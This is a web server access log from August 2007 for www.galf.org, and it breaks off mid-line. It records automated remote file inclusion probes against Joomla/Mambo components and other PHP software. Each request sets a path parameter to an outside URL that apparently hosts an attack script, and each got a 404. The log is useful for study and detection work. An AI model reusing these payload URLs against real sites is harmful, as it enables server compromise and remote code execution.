89.111.173.45 - - [13/Aug/2007:00:01:28 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.151.88.7 - - [13/Aug/2007:00:03:29 -0700] "GET /logs//plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.151.88.7 - - [13/Aug/2007:00:03:29 -0700] "GET //plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.29.43.67 - - [13/Aug/2007:00:05:03 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [13/Aug/2007:00:05:10 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.180.6 - - [13/Aug/2007:00:05:20 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.38.180.6 - - [13/Aug/2007:00:05:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.38.180.6 - - [13/Aug/2007:00:05:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.38.180.6 - - [13/Aug/2007:00:05:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.80.60.44 - - [13/Aug/2007:00:05:24 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.44 - - [13/Aug/2007:00:05:24 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [13/Aug/2007:00:06:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [13/Aug/2007:00:06:10 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [13/Aug/2007:00:06:10 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.96.66.64 - - [13/Aug/2007:00:06:12 -0700] "GET /logs/index.php?go=http://h1.ripway.com/r00tz/enemy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.96.66.64 - - [13/Aug/2007:00:06:12 -0700] "GET /index.php?go=http://h1.ripway.com/r00tz/enemy.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.210.102.125 - - [13/Aug/2007:00:06:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [13/Aug/2007:00:06:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.41 - - [13/Aug/2007:00:07:07 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.193.232.6 - - [13/Aug/2007:00:07:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [13/Aug/2007:00:07:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.60.115.20 - - [13/Aug/2007:00:10:05 -0700] "GET /logs/path_of_cpcommerce/_functions.php?prefix=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.60.115.20 - - [13/Aug/2007:00:10:05 -0700] "GET /path_of_cpcommerce/_functions.php?prefix=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.80.60.41 - - [13/Aug/2007:00:12:33 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.151.88.7 - - [13/Aug/2007:00:12:35 -0700] "GET /logs//plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.151.88.7 - - [13/Aug/2007:00:12:35 -0700] "GET //plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.202.240.121 - - [13/Aug/2007:00:12:37 -0700] "GET /components/com_artlinks/artlin